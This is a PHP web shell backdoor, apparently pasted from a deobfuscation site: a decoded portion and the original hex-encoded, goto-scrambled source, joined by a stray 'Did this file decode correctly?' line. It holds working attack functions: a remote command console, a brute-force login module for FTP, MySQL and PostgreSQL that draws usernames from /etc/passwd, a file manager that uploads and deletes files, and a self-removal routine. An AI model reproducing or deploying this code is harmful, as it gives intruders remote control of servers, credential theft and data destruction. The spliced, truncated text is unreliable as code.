(isset($_POST["p3"])) { $_POST["p3"] = iconv("utf-8", $_POST["charset"], decrypt($_POST["p3"], $_COOKIE[md5($_SERVER["HTTP_HOST"]) . "key"])); } } goto nbMDY; ZuuFx: $safe_mode = @ini_get("safe_mode"); goto AH6j_; p2UEO: @ini_set("error_log", NULL); goto r2c06; XXfsY: function perms($p) { if (($p & 49152) == 49152) { $i = "s"; } elseif (($p & 40960) == 40960) { $i = "l"; } elseif (($p & 32768) == 32768) { $i = "-"; } elseif (($p & 24576) == 24576) { $i = "b"; } elseif (($p & 16384) == 16384) { $i = "d"; } elseif (($p & 8192) == 8192) { $i = "c"; } elseif (($p & 4096) == 4096) { $i = "p"; } else { $i = "u"; } $i .= $p & 256 ? "r" : "-"; $i .= $p & 128 ? "w" : "-"; $i .= $p & 64 ? $p & 2048 ? "s" : "x" : ($p & 2048 ? "S" : "-"); $i .= $p & 32 ? "r" : "-"; $i .= $p & 16 ? "w" : "-"; $i .= $p & 8 ? $p & 1024 ? "s" : "x" : ($p & 1024 ? "S" : "-"); $i .= $p & 4 ? "r" : "-"; $i .= $p & 2 ? "w" : "-"; $i .= $p & 1 ? $p & 512 ? "t" : "x" : ($p & 512 ? "T" : "-"); return $i; } goto Y5ImI; Y2Zvy: function actionConsole() { if (!empty($_POST["p1"]) && !empty($_POST["p2"])) { prototype(md5($_SERVER["HTTP_HOST"]) . "stderr_to_out", true); $_POST["p1"] .= " 2>&1"; } elseif (!empty($_POST["p1"])) { prototype(md5($_SERVER["HTTP_HOST"]) . "stderr_to_out", 0); } if (isset($_POST["ajax"])) { prototype(md5($_SERVER["HTTP_HOST"]) . "ajax", true); ob_start(); echo "d.cf.cmd.value='';\xa"; $temp = @iconv($_POST["charset"], "UTF-8", addcslashes("\xa$ " . $_POST["p1"] . "\xa" . ex($_POST["p1"]), "\xa\xd\x9\'\x0")); if (preg_match("!.*cd\s+([^;]+)$!", $_POST["p1"], $match)) { if (@chdir($match[1])) { $GLOBALS["cwd"] = @getcwd(); echo "c_='" . $GLOBALS["cwd"] . "';"; } } echo "d.cf.output.value+='" . $temp . "';"; echo "d.cf.output.scrollTop = d.cf.output.scrollHeight;"; $temp = ob_get_clean(); echo strlen($temp), "\xa", $temp; die; } if (empty($_POST["ajax"]) && !empty($_POST["p1"])) { prototype(md5($_SERVER["HTTP_HOST"]) . "ajax", 0); } hardHeader(); echo "<script>\xaif(window.Event) window.captureEvents(Event.KEYDOWN);
var cmds = new Array('');\xavar cur = 0;
function kp(e) {\xa\x9var n = (window.Event) ? e.which : e.keyCode;
	if(n == 38) {\xa		cur--;
\x9\x9if(cur>=0)
	\x9	document.cf.cmd.value = cmds[cur];
\x9	else
\x9\x9	cur++;
	} else if(n == 40) {\xa\x9	cur++;
		if(cur < cmds.length)
		\x9document.cf.cmd.value = cmds[cur];\xa	\x9else\xa	\x9	cur--;
\x9}
}\xafunction add(cmd) {
	cmds.pop();
\x9cmds.push(cmd);\xa	cmds.push('');\xa	cur = cmds.length-1;\xa}
</script>"; echo "<h1>Console</h1><div class=content><form name=cf onsubmit="if(d.cf.cmd.value=='clear'){d.cf.output.value='';d.cf.cmd.value='';return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value,this.show_errors.checked?1:'');}else{g(null,null,this.cmd.value,this.show_errors.checked?1:'');} return false;"><label><select name=alias>"; foreach ($GLOBALS["aliases"] as $n => $v) { if ($v == '') { echo "<optgroup label="-" . htmlspecialchars($n) . "-"></optgroup>"; continue; } echo "<option value="" . htmlspecialchars($v) . "">" . $n . "</option>"; } echo "</select></label><input type=button onclick="add(d.cf.alias.value);if(d.cf.ajax.checked){a(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:'');}else{g(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:'');}" value="submit"> <nobr><input type=checkbox name=ajax value=1 " . (@$_COOKIE[md5($_SERVER["HTTP_HOST"]) . "ajax"] ? "checked" : '') . "> send using AJAX <input type=checkbox name=show_errors value=1 " . (!empty($_POST["p2"]) || $_COOKIE[md5($_SERVER["HTTP_HOST"]) . "stderr_to_out"] ? "checked" : '') . "> redirect stderr to stdout (2>&1)</nobr><br/><textarea class=bigarea name=output style="border-bottom:0;margin-top:5px;" readonly>"; if (!empty($_POST["p1"])) { echo htmlspecialchars("$ " . $_POST["p1"] . "
" . ex($_POST["p1"])); } echo "</textarea><table style="border:1px solid #060a10;background-color:#060a10;border-top:0px;" cellpadding=0 cellspacing=0 width="100%"><tr><td style="padding-left:4px; width:13px;">$</td><td><input type=text name=cmd style="border:0px;width:100%;" onkeydown="kp(event);"></td></tr></table>"; echo "</form></div><script>d.cf.cmd.focus();</script>"; hardFooter(); } goto WMTEU; G8cmK: function actionBruteforce() { hardHeader(); if (isset($_POST["proto"])) { echo "<h1>Results</h1><div class=content><span>Type:</span> " . htmlspecialchars($_POST["proto"]) . " <span>Server:</span> " . htmlspecialchars($_POST["server"]) . "<br>"; if ($_POST["proto"] == "ftp") { function bruteForce($ip, $port, $login, $pass) { $fp = @ftp_connect($ip, $port ? $port : 21); if (!$fp) { return false; } $res = @ftp_login($fp, $login, $pass); @ftp_close($fp); return $res; } } elseif ($_POST["proto"] == "mysql") { function bruteForce($ip, $port, $login, $pass) { $res = @mysql_connect($ip . ":" . ($port ? $port : 3306), $login, $pass); @mysql_close($res); return $res; } } elseif ($_POST["proto"] == "pgsql") { function bruteForce($ip, $port, $login, $pass) { $str = "host='" . $ip . "' port='" . $port . "' user='" . $login . "' password='" . $pass . "' dbname=postgres"; $res = @pg_connect($str); @pg_close($res); return $res; } } $success = 0; $attempts = 0; $server = explode(":", $_POST["server"]); if ($_POST["type"] == 1) { $temp = @file("/etc/passwd"); if (is_array($temp)) { foreach ($temp as $line) { $line = explode(":", $line); ++$attempts; if (bruteForce(@$server[0], @$server[1], $line[0], $line[0])) { $success++; echo "<b>" . htmlspecialchars($line[0]) . "</b>:" . htmlspecialchars($line[0]) . "<br>"; } if (@$_POST["reverse"]) { $tmp = ''; for ($i = strlen($line[0]) - 1; $i >= 0; --$i) { $tmp .= $line[0][$i]; } ++$attempts; if (bruteForce(@$server[0], @$server[1], $line[0], $tmp)) { $success++; echo "<b>" . htmlspecialchars($line[0]) . "</b>:" . htmlspecialchars($tmp); } } } } } elseif ($_POST["type"] == 2) { $temp = @file($_POST["dict"]); if (is_array($temp)) { foreach ($temp as $line) { $line = trim($line); ++$attempts; if (bruteForce($server[0], @$server[1], $_POST["login"], $line)) { $success++; echo "<b>" . htmlspecialchars($_POST["login"]) . "</b>:" . htmlspecialchars($line) . "<br>"; } } } } echo "<span>Attempts:</span> {$attempts} <span>Success:</span> {$success}</div><br>"; } echo  ?>

Did this file decode correctly?

Original Code

 goto tR9xz; qhLgb: function hardFooter() { $is_writable = is_writable($GLOBALS["\143\167\144"]) ? "\40\x3c\x66\157\156\x74\40\x63\x6f\154\x6f\x72\x3d\x27\43\106\106\104\102\65\x46\47\76\x5b\40\127\162\151\x74\x65\x61\142\x6c\x65\40\135\74\57\x66\x6f\x6e\164\76" : "\x20\74\146\x6f\156\x74\40\x63\157\x6c\x6f\162\x3d\x72\145\x64\x3e\50\116\157\164\x20\x77\x72\151\164\141\x62\x6c\x65\51\74\x2f\146\x6f\x6e\164\x3e"; echo "\12\x3c\57\x64\151\166\76\xa\x3c\x74\x61\142\x6c\x65\x20\143\154\141\x73\x73\x3d\151\x6e\x66\157\x20\151\x64\75\x74\157\157\154\x73\x54\x62\154\40\143\x65\x6c\x6c\x70\x61\x64\144\151\x6e\x67\75\x33\x20\143\145\154\x6c\x73\160\x61\143\151\156\x67\x3d\60\40\x77\151\x64\164\150\75\x31\x30\x30\x25\76\12\x9\74\164\162\x3e\xa\11\x9\74\164\144\76\x3c\146\157\x72\x6d\40\157\x6e\x73\x75\142\155\x69\164\x3d\x22" . (function_exists("\141\x63\164\151\157\156\106\x69\x6c\x65\x73\x4d\141\156") ? "\x67\50\x6e\165\154\154\x2c\164\150\x69\163\x2e\143\56\166\x61\154\165\x65\54\x27\x27\x29\x3b" : '') . "\162\145\164\165\162\156\x20\x66\x61\x6c\x73\x65\73\42\76\74\x73\160\x61\x6e\x3e\x43\150\141\x6e\147\145\40\x64\x69\x72\72\x3c\57\x73\x70\141\x6e\x3e\74\x62\x72\76\x3c\x69\156\x70\165\164\40\143\154\x61\163\x73\75\47\164\157\x6f\x6c\x73\111\x6e\x70\47\x20\164\171\160\x65\75\x74\145\x78\164\40\156\x61\155\145\75\x63\40\x76\x61\154\165\x65\75\x27" . htmlspecialchars($GLOBALS["\x63\167\x64"]) . "\47\x3e\x3c\x69\156\160\165\164\x20\x74\x79\x70\145\x3d\163\165\142\x6d\151\x74\40\166\x61\x6c\x75\x65\x3d\47\x73\x75\x62\x6d\x69\x74\x27\76\74\x2f\146\x6f\x72\155\76\x3c\x2f\x74\144\76\xa\11\x9\74\x74\x64\76\x3c\146\x6f\162\x6d\x20\157\156\x73\x75\x62\155\151\x74\x3d\x22" . (function_exists("\141\143\x74\151\x6f\x6e\106\151\154\x65\x73\x54\x6f\x6f\154\x73") ? "\147\50\x27\106\x69\x6c\x65\163\124\x6f\x6f\x6c\x73\x27\54\156\165\154\x6c\54\x74\150\x69\163\x2e\x66\x2e\166\141\x6c\x75\x65\x29\x3b" : '') . "\162\x65\x74\165\x72\156\x20\146\141\x6c\x73\x65\73\42\x3e\x3c\x73\x70\141\156\76\122\145\141\144\x20\146\x69\154\x65\x3a\x3c\x2f\x73\160\141\x6e\76\74\142\162\x3e\x3c\151\156\x70\165\x74\x20\x63\154\x61\163\x73\x3d\47\164\x6f\x6f\154\163\x49\x6e\160\x27\40\164\171\160\145\75\164\145\x78\x74\40\156\141\x6d\x65\x3d\x66\x20\x72\x65\161\x75\x69\x72\x65\x64\x3e\x3c\x69\x6e\x70\x75\x74\40\164\171\160\x65\x3d\x73\165\x62\155\x69\x74\40\166\141\x6c\165\x65\x3d\x27\x73\165\x62\x6d\x69\x74\x27\76\x3c\x2f\146\x6f\x72\155\76\x3c\x2f\x74\x64\x3e\12\x9\74\57\x74\x72\x3e\x3c\x74\162\x3e\xa\11\x9\74\164\x64\x3e\74\146\x6f\x72\x6d\x20\x6f\156\163\x75\x62\x6d\151\x74\75\42" . (function_exists("\x61\143\x74\151\x6f\x6e\x46\151\x6c\x65\x73\115\x61\156") ? "\147\x28\x27\106\x69\154\145\x73\x4d\x61\156\47\54\156\165\154\x6c\x2c\x27\155\153\x64\151\162\47\x2c\164\150\151\163\x2e\x64\56\166\141\154\x75\145\x29\73" : '') . "\x72\x65\x74\165\x72\156\40\x66\x61\x6c\x73\145\73\x22\x3e\74\x73\x70\x61\x6e\76\x4d\x61\x6b\x65\x20\144\x69\x72\x3a\x3c\57\x73\160\x61\156\76{$is_writable}\x3c\142\x72\x3e\74\x69\x6e\160\165\164\x20\x63\x6c\141\163\x73\75\x27\164\157\x6f\x6c\163\111\x6e\160\x27\40\x74\171\160\x65\75\x74\x65\x78\164\x20\156\x61\155\x65\x3d\144\x20\x72\145\161\x75\151\162\145\144\x3e\x3c\x69\156\160\165\x74\40\x74\x79\160\x65\x3d\163\x75\142\155\151\x74\40\166\141\x6c\x75\x65\75\47\163\165\x62\x6d\x69\x74\47\76\x3c\x2f\x66\x6f\x72\x6d\x3e\74\x2f\x74\144\76\12\x9\11\x3c\x74\144\x3e\x3c\x66\x6f\162\x6d\40\x6f\x6e\163\165\142\x6d\151\x74\x3d\x22" . (function_exists("\x61\x63\x74\x69\x6f\x6e\x46\151\154\145\x73\x54\157\157\x6c\x73") ? "\147\50\47\x46\x69\x6c\145\x73\x54\157\x6f\x6c\x73\x27\54\156\165\154\154\54\164\150\151\163\x2e\146\56\166\141\x6c\165\145\x2c\x27\x6d\153\x66\x69\154\145\x27\51\73" : '') . "\162\145\164\x75\x72\156\x20\x66\x61\x6c\163\145\x3b\x22\76\x3c\163\x70\141\156\76\x4d\141\x6b\145\40\146\x69\x6c\x65\72\x3c\x2f\163\x70\x61\156\76{$is_writable}\x3c\x62\x72\x3e\74\x69\x6e\x70\x75\164\40\x63\x6c\x61\x73\x73\75\x27\164\x6f\x6f\154\x73\111\x6e\160\x27\40\164\x79\160\x65\75\164\145\170\x74\x20\x6e\141\155\145\x3d\x66\x20\162\145\161\165\151\162\145\x64\76\74\151\x6e\x70\x75\x74\x20\x74\171\160\145\75\163\165\x62\x6d\x69\x74\x20\x76\141\x6c\165\x65\75\x27\163\x75\142\x6d\151\x74\x27\x3e\74\x2f\x66\x6f\162\155\76\x3c\x2f\x74\x64\x3e\xa\x9\x3c\57\x74\162\76\74\x74\162\76\12\x9\x9\74\x74\x64\x3e\x3c\146\157\x72\155\x20\157\x6e\163\x75\142\x6d\x69\164\75\42" . (function_exists("\141\143\x74\151\157\x6e\x43\x6f\x6e\163\x6f\x6c\145") ? "\147\50\47\x43\x6f\156\163\157\154\145\47\54\x6e\x75\154\x6c\x2c\x74\150\x69\163\x2e\143\x2e\166\141\154\165\x65\51\73" : '') . "\x72\x65\164\x75\x72\156\x20\146\x61\154\x73\x65\73\x22\x3e\74\163\160\x61\156\76\x45\x78\145\143\165\164\145\72\74\57\163\x70\141\156\x3e\74\142\162\x3e\74\x69\156\x70\165\x74\40\143\x6c\141\163\x73\75\x27\x74\x6f\157\x6c\x73\111\156\160\x27\40\x74\171\160\145\x3d\x74\145\170\x74\40\156\141\x6d\x65\75\x63\40\x76\141\x6c\x75\145\x3d\x27\x27\76\x3c\151\x6e\x70\165\x74\40\164\x79\x70\x65\75\163\165\142\x6d\x69\x74\40\166\x61\x6c\x75\145\75\47\x73\x75\142\155\x69\164\47\x3e\x3c\x2f\146\x6f\162\x6d\x3e\74\57\164\144\x3e\xa\11\11\74\x74\144\x3e\x3c\x66\x6f\x72\155\x20\x6d\x65\x74\x68\157\x64\x3d\x27\160\157\163\164\47\40" . (!function_exists("\x61\x63\x74\x69\x6f\x6e\x46\151\x6c\145\x73\115\141\x6e") ? "\x20\x6f\156\163\x75\x62\155\x69\x74\75\42\162\145\164\165\x72\x6e\40\x66\141\x6c\163\x65\x3b\42\x20" : '') . "\105\116\x43\x54\131\120\105\x3d\x27\155\x75\154\164\x69\x70\141\162\164\57\x66\157\x72\155\55\144\x61\x74\x61\x27\76\xa\x9\11\x3c\x69\156\160\165\x74\40\x74\171\x70\x65\x3d\x68\151\x64\x64\145\x6e\x20\156\x61\155\x65\75\x61\x20\166\141\154\x75\145\75\47\106\151\x6c\145\x73\x4d\x61\156\47\76\12\x9\11\x3c\151\156\160\165\164\40\x74\x79\x70\x65\75\x68\x69\x64\x64\x65\x6e\40\156\141\155\145\75\143\x20\x76\141\154\x75\x65\75\x27" . htmlspecialchars($GLOBALS["\143\x77\144"]) . "\47\x3e\xa\x9\11\x3c\151\x6e\160\x75\x74\40\x74\x79\x70\x65\x3d\x68\151\x64\144\145\x6e\x20\156\x61\x6d\145\x3d\160\x31\40\x76\141\x6c\165\x65\x3d\47\165\x70\x6c\157\141\144\106\151\x6c\x65\47\76\12\11\x9\74\x69\156\160\165\x74\40\164\x79\x70\x65\75\x68\x69\x64\x64\145\x6e\x20\x6e\x61\155\145\75\x6e\145\x20\166\x61\x6c\165\145\x3d\x27\47\x3e\xa\11\x9\x3c\151\x6e\x70\165\x74\40\x74\171\x70\x65\x3d\x68\x69\x64\144\x65\x6e\40\156\141\155\x65\75\143\150\x61\162\163\x65\164\40\x76\141\x6c\165\x65\75\x27" . (isset($_POST["\x63\150\x61\162\x73\x65\164"]) ? $_POST["\143\x68\x61\x72\x73\145\164"] : '') . "\47\76\12\11\11\74\x73\160\141\x6e\x3e\125\160\x6c\x6f\141\x64\40\x66\x69\154\145\72\x3c\57\163\160\x61\156\x3e{$is_writable}\74\142\x72\76\x3c\151\156\x70\x75\164\x20\x63\154\141\163\x73\x3d\47\x74\157\x6f\154\163\x49\x6e\x70\47\40\164\171\x70\145\x3d\x66\151\154\145\x20\x6e\141\x6d\x65\75\146\133\x5d\x20\40\155\x75\x6c\164\x69\x70\154\x65\x3e\x3c\151\156\x70\x75\x74\40\164\171\160\145\75\163\165\142\155\x69\164\x20\x76\141\x6c\165\145\x3d\47\163\x75\142\155\x69\x74\x27\x3e\x3c\57\x66\157\x72\155\x3e\x3c\x62\162\40\x20\76\74\57\x74\144\76\xa\11\74\x2f\164\162\76\x3c\x2f\164\141\x62\x6c\145\76\x3c\57\144\151\166\76\12\11\74\x21\x2d\55\40\160\141\162\164\x69\x63\x6c\x65\x73\x20\x2d\x2d\x3e\40\74\x64\x69\166\40\x69\144\x3d\47\160\141\162\x74\151\143\154\145\x73\55\152\x73\x27\x3e\x3c\x2f\x64\x69\166\x3e\x3c\x73\x63\162\151\x70\164\x20\x73\x72\143\x3d\x27\x68\164\164\160\x3a\x2f\57\x63\x64\156\56\152\x73\144\x65\154\151\166\162\x2e\x6e\x65\164\57\x70\141\x72\x74\151\x63\154\145\163\x2e\x6a\x73\57\62\x2e\x30\56\x30\x2f\160\x61\x72\164\151\x63\154\145\x73\56\155\x69\156\56\x6a\163\47\x3e\74\57\x73\x63\162\151\x70\164\x3e\12\x9\74\x73\x63\x72\151\160\x74\x3e\160\141\x72\x74\x69\x63\154\145\x73\112\x53\x28\47\x70\141\x72\164\x69\143\x6c\x65\x73\x2d\x6a\x73\47\54\40\x7b\x27\x70\141\x72\x74\151\x63\x6c\145\163\47\72\x7b\x27\x6e\x75\x6d\142\145\162\x27\72\173\x27\x76\141\154\x75\x65\x27\x3a\70\60\x2c\47\x64\145\x6e\163\151\164\x79\x27\72\173\47\145\x6e\141\x62\154\x65\x27\x3a\164\x72\165\145\54\47\x76\x61\154\165\x65\x5f\141\x72\145\x61\x27\72\x38\x30\60\175\175\54\47\x63\157\x6c\x6f\x72\x27\x3a\173\x27\166\x61\x6c\165\145\x27\72\47\x23\146\x66\146\146\146\146\47\x7d\x2c\x27\163\150\x61\x70\145\47\x3a\x7b\47\164\x79\160\145\47\x3a\47\x74\162\x69\x61\x6e\x67\x6c\x65\x27\x2c\x27\x73\x74\x72\157\x6b\145\47\72\x7b\47\167\151\x64\164\x68\x27\x3a\60\54\x27\x63\x6f\x6c\x6f\162\x27\72\x27\x23\60\60\x30\x30\x30\x30\x27\175\54\x27\160\x6f\x6c\x79\x67\157\x6e\47\72\173\47\x6e\x62\137\163\x69\x64\145\x73\x27\x3a\65\x7d\x2c\x27\x69\155\x61\147\x65\x27\x3a\173\x27\x73\x72\143\47\72\47\151\x6d\147\x2f\x67\151\x74\x68\165\x62\56\x73\x76\x67\x27\x2c\47\167\151\144\164\150\x27\72\61\60\60\x2c\47\150\x65\151\x67\150\x74\x27\72\x31\x30\60\175\175\x2c\47\157\160\141\143\151\x74\171\x27\72\173\47\x76\141\x6c\165\145\x27\x3a\60\x2e\65\x2c\47\x72\x61\x6e\144\157\x6d\47\72\x74\162\165\x65\x2c\47\141\x6e\151\155\x27\72\173\x27\x65\156\x61\x62\154\145\x27\72\146\141\x6c\x73\145\54\47\x73\160\145\145\x64\x27\x3a\x31\x2c\47\x6f\x70\x61\x63\x69\164\171\x5f\155\x69\x6e\47\72\x30\56\x31\x2c\47\x73\171\156\143\x27\72\146\141\x6c\x73\x65\x7d\x7d\54\x27\x73\x69\x7a\145\47\72\173\47\166\x61\154\165\x65\x27\x3a\63\x2c\x27\162\141\x6e\x64\157\155\x27\x3a\x74\x72\165\145\54\47\141\156\151\155\47\x3a\173\47\x65\156\141\x62\x6c\x65\47\72\146\x61\x6c\x73\145\x2c\x27\163\x70\x65\145\x64\x27\72\x34\x30\54\x27\163\x69\x7a\x65\137\155\x69\156\x27\72\x30\x2e\x31\54\47\x73\x79\156\143\x27\72\x66\x61\x6c\163\x65\x7d\x7d\x2c\47\x6c\x69\156\145\137\x6c\x69\156\x6b\145\x64\47\72\173\x27\145\156\x61\x62\154\145\x27\x3a\164\x72\x75\145\x2c\47\144\x69\163\x74\x61\156\143\145\47\72\62\x30\x30\x2c\47\x63\157\x6c\157\162\47\72\x27\x23\x66\x66\x66\x66\146\x66\47\54\x27\157\x70\x61\x63\151\164\x79\x27\x3a\60\56\64\x2c\47\x77\151\144\x74\x68\47\x3a\61\175\x2c\47\x6d\157\x76\145\47\72\173\47\x65\x6e\x61\x62\154\x65\47\72\164\162\x75\145\54\47\x73\x70\145\x65\144\47\72\x31\x2c\47\144\x69\x72\x65\143\164\151\x6f\156\47\72\x27\156\157\156\x65\x27\54\47\162\141\x6e\x64\157\155\x27\72\x74\162\165\x65\x2c\x27\163\164\162\x61\x69\147\150\164\47\x3a\x66\141\x6c\x73\145\54\47\157\165\164\x5f\x6d\x6f\144\x65\x27\72\x27\157\x75\164\47\x2c\47\x62\157\x75\156\143\x65\x27\72\146\x61\x6c\163\x65\x2c\47\x61\x74\164\x72\141\x63\x74\47\72\173\x27\x65\156\141\142\x6c\145\x27\72\x66\x61\x6c\x73\x65\54\47\162\x6f\x74\x61\x74\x65\130\47\x3a\61\x30\x30\x30\x30\x2c\x27\x72\x6f\164\x61\x74\x65\x59\x27\72\x31\x30\x30\60\60\x7d\x7d\175\x2c\x27\x69\156\x74\x65\162\141\143\164\x69\x76\x69\164\171\x27\x3a\173\47\x64\x65\x74\145\x63\164\137\157\x6e\47\72\47\143\x61\156\x76\x61\x73\47\54\47\x65\166\145\x6e\x74\163\x27\72\x7b\47\157\x6e\x68\157\166\x65\162\x27\72\x7b\47\145\156\141\x62\154\145\x27\72\164\162\x75\145\x2c\47\155\157\x64\x65\47\x3a\x27\147\162\x61\x62\47\x7d\54\47\x6f\x6e\143\154\151\x63\x6b\47\x3a\173\x27\145\x6e\141\142\154\145\x27\x3a\164\x72\165\145\x2c\47\x6d\x6f\x64\145\47\x3a\47\x72\145\160\x75\154\x73\x65\x27\x7d\54\47\x72\145\x73\x69\172\145\47\x3a\x74\x72\x75\x65\x7d\x2c\47\155\157\x64\x65\x73\47\72\173\47\x67\162\x61\142\x27\72\173\x27\144\x69\163\164\x61\156\143\145\47\72\x32\60\60\x2c\x27\x6c\151\156\x65\x5f\154\151\156\153\145\x64\47\72\x7b\47\x6f\160\x61\x63\x69\164\x79\47\72\x30\56\65\175\175\x2c\x27\142\165\142\142\x6c\x65\x27\72\x7b\x27\x70\141\162\x74\151\143\x6c\145\163\x5f\x6e\142\x27\x3a\x32\x7d\x7d\175\54\47\162\x65\x74\x69\156\141\x5f\x64\145\164\x65\x63\x74\x27\72\164\162\165\x65\x7d\x29\73\x3c\x2f\x73\x63\x72\x69\160\x74\x3e\xa\11\x3c\57\142\x6f\144\171\x3e\x3c\x2f\x68\x74\155\x6c\x3e"; } goto DJcUw; nbMDY: function formatSizeUnits($bytes) { if ($bytes >= 1073741824) { $bytes = number_format($bytes / 1073741824, 2) . "\x20\x47\x42"; } elseif ($bytes >= 1048576) { $bytes = number_format($bytes / 1048576, 2) . "\40\115\102"; } elseif ($bytes >= 1024) { $bytes = number_format($bytes / 1024, 2) . "\40\113\x42"; } elseif ($bytes > 1) { $bytes = $bytes . "\40\142\x79\x74\x65\x73"; } elseif ($bytes == 1) { $bytes = $bytes . "\x20\142\171\164\145"; } else { $bytes = "\60\40\x62\171\x74\145\x73"; } return $bytes; } goto XXrTo; O8Bkq: function actionSelfRemove() { if ($_POST["\x70\61"] == "\x79\145\x73") { if (@unlink(preg_replace("\41\x5c\50\x5c\144\x2b\x5c\x29\x5c\163\x2e\x2a\41", '', __FILE__))) { die("\x53\150\145\154\154\40\x68\141\x73\40\x62\145\x65\156\40\x72\x65\x6d\x6f\166\145\144"); } else { echo "\x75\156\154\151\156\153\x20\145\162\x72\157\162\x21"; } } if ($_POST["\x70\61"] != "\171\145\163") { hardHeader(); } echo "\74\x68\x31\x3e\x53\165\x69\143\x69\144\x65\74\x2f\x68\61\76\74\144\x69\166\x20\143\154\x61\163\x73\x3d\x63\x6f\156\x74\x65\x6e\164\76\122\145\141\x6c\154\x79\40\x77\x61\156\x74\40\x74\157\40\162\145\155\x6f\x76\x65\40\x74\x68\145\x20\163\x68\145\x6c\154\x3f\74\x62\x72\x3e\x3c\141\x20\x68\162\145\146\x3d\x23\x20\x6f\156\143\x6c\x69\143\153\75\42\147\50\156\165\x6c\154\x2c\x6e\x75\154\x6c\x2c\x27\171\145\x73\47\51\x22\x3e\131\x65\x73\x3c\57\141\x3e\x3c\x2f\x64\x69\x76\x3e"; hardFooter(); } goto u4WS6; KOaKG: function actionFilesMan() { if (!empty($_COOKIE["\x66"])) { $_COOKIE["\x66"] = @unserialize($_COOKIE["\x66"]); } if (!empty($_POST["\160\x31"])) { switch ($_POST["\160\x31"]) { case "\x75\160\154\157\141\144\106\151\x6c\145": if (is_array($_FILES["\146"]["\x74\x6d\160\x5f\x6e\141\x6d\x65"])) { foreach ($_FILES["\146"]["\164\155\x70\x5f\156\x61\x6d\145"] as $i => $tmpName) { if (!@move_uploaded_file($tmpName, $_FILES["\x66"]["\x6e\141\155\x65"][$i])) { echo "\103\x61\x6e\x27\164\x20\x75\x70\154\x6f\x61\x64\40\x66\151\x6c\x65\41"; } } } break; case "\x6d\x6b\x64\151\162": if (!@mkdir($_POST["\160\x32"])) { echo "\103\x61\x6e\x27\164\x20\143\x72\145\x61\164\145\x20\156\145\x77\x20\x64\151\162"; } break; case "\x64\x65\x6c\x65\x74\x65": function deleteDir($path) { $path = substr($path, -1) == "\x2f" ? $path : $path . "\57"; $dh = opendir($path); while (($ = readdir($dh)) !== false) { $ = $path . $; if (basename($) == "\56\56" || basename($) == "\56") { continue; } $type = filetype($); if ($type == "\144\151\162") { deleteDir($); } else { @unlink($); } } closedir($dh); @rmdir($path); } if (is_array(@$_POST["\x66"])) { foreach ($_POST["\x66"] as $f) { if ($f == "\56\x2e") { continue; } $f = urldecode($f); if (is_dir($f)) { deleteDir($f); } else { @unlink($f); } } } break; case "\x70\141\163\x74\x65": if ($_COOKIE["\141\x63\164"] == "\x63\157\160\x79") { function copy_paste($c, $s, $d) { if (is_dir($c . $s)) { mkdir($d . $s); $h = @opendir($c . $s); while (($f = @readdir($h)) !== false) { if ($f != "\56" and $f != "\x2e\56") { copy_paste($c . $s . "\57", $f, $d . $s . "\57"); } } } elseif (is_file($c . $s)) { @copy($c . $s, $d . $s); } } foreach ($_COOKIE["\146"] as $f) { copy_paste($_COOKIE["\143"], $f, $GLOBALS["\x63\x77\144"]); } } elseif ($_COOKIE["\141\143\164"] == "\155\157\x76\x65") { function move_paste($c, $s, $d) { if (is_dir($c . $s)) { mkdir($d . $s); $h = @opendir($c . $s); while (($f = @readdir($h)) !== false) { if ($f != "\x2e" and $f != "\56\x2e") { copy_paste($c . $s . "\x2f", $f, $d . $s . "\x2f"); } } } elseif (@is_file($c . $s)) { @copy($c . $s, $d . $s); } } foreach ($_COOKIE["\x66"] as $f) { @rename($_COOKIE["\x63"] . $f, $GLOBALS["\143\x77\x64"] . $f); } } elseif ($_COOKIE["\x61\x63\x74"] == "\172\151\160") { if (class_exists("\x5a\x69\160\101\162\x63\x68\x69\166\145")) { $zip = new ZipArchive(); if ($zip->open($_POST["\x70\62"], 1)) { chdir($_COOKIE["\x63"]); foreach ($_COOKIE["\146"] as $f) { if ($f == "\x2e\x2e") { continue; } if (@is_file($_COOKIE["\x63"] . $f)) { $zip->addFile($_COOKIE["\x63"] . $f, $f); } elseif (@is_dir($_COOKIE["\143"] . $f)) { $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f . "\57", FilesystemIterator::SKIP_DOTS)); foreach ($iterator as $key => $value) { $zip->addFile(realpath($key), $key); } } } chdir($GLOBALS["\143\x77\x64"]); $zip->close(); } } } elseif ($_COOKIE["\141\143\x74"] == "\x75\x6e\x7a\151\x70") { if (class_exists("\x5a\x69\x70\101\x72\x63\150\x69\x76\145")) { $zip = new ZipArchive(); foreach ($_COOKIE["\x66"] as $f) { if ($zip->open($_COOKIE["\143"] . $f)) { $zip->extractTo($GLOBALS["\143\x77\x64"]); $zip->close(); } } } } elseif ($_COOKIE["\141\x63\164"] == "\164\x61\162") { chdir($_COOKIE["\x63"]); $_COOKIE["\146"] = array_map("\145\x73\143\x61\x70\x65\x73\x68\x65\x6c\154\x61\x72\147", $_COOKIE["\146"]); ex("\164\x61\162\x20\143\x66\x7a\x76\x20" . escapeshellarg($_POST["\160\x32"]) . "\40" . implode("\40", $_COOKIE["\x66"])); chdir($GLOBALS["\x63\167\144"]); } unset($_COOKIE["\x66"]); setcookie("\146", '', time() - 3600); break; default: if (!empty($_POST["\160\x31"])) { prototype("\141\143\164", $_POST["\x70\61"]); prototype("\x66", serialize(@$_POST["\146"])); prototype("\143", @$_POST["\x63"]); } break; } } hardHeader(); echo "\x3c\x68\x31\76\x46\x69\x6c\145\40\x6d\141\x6e\141\147\145\x72\74\57\150\61\x3e\x3c\x64\151\166\x20\x63\154\141\x73\163\x3d\143\x6f\x6e\164\145\156\164\76\x3c\163\x63\162\151\x70\x74\76\x70\x31\137\75\160\62\137\75\x70\x33\137\75\x22\x22\x3b\x3c\x2f\x73\143\x72\x69\160\164\76"; $dirContent = hardScandir(isset($_POST["\143"]) ? $_POST["\143"] : $GLOBALS["\x63\167\x64"]); if ($dirContent === false) { echo "\x43\x61\156\47\164\x20\157\x70\x65\x6e\x20\x74\x68\151\x73\x20\146\157\154\x64\x65\x72\x21"; hardFooter(); return; } global $sort; $sort = array("\156\x61\155\x65", 1); if (!empty($_POST["\x70\61"])) { if (preg_match("\41\163\x5f\x28\x5b\101\55\x7a\x5d\x2b\x29\137\50\134\144\173\61\175\x29\41", $_POST["\160\x31"], $match)) { $sort = array($match[1], (int) $match[2]); } } echo 